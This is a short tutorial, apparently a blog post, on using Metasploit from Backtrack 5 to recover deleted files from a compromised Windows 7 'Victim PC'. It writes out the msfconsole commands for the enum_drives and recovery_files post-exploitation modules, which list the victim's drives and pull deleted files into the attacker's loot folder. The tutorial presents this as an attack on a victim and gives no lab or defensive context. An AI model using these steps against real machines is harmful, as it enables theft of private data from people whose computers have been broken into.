Recover Deleted Data from Remote Victim PC

This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. "pdf") to recover deleted files with that extension. Or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).

Exploit Targets
Windows 7

Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open your backtrack terminal and type msfconsole

Run the following command to list all the drives of victim PC

Now type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit  

Run the following command to recover the deleted data of the Victim PC
(I am using H: drive in my case)

Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive h:
msf exploit (recovery_files)>exploit   

Run the following command to save the deleted data on /root/.msf4/loot
Set files 1073777664,1073778688,1073779212


Post a Comment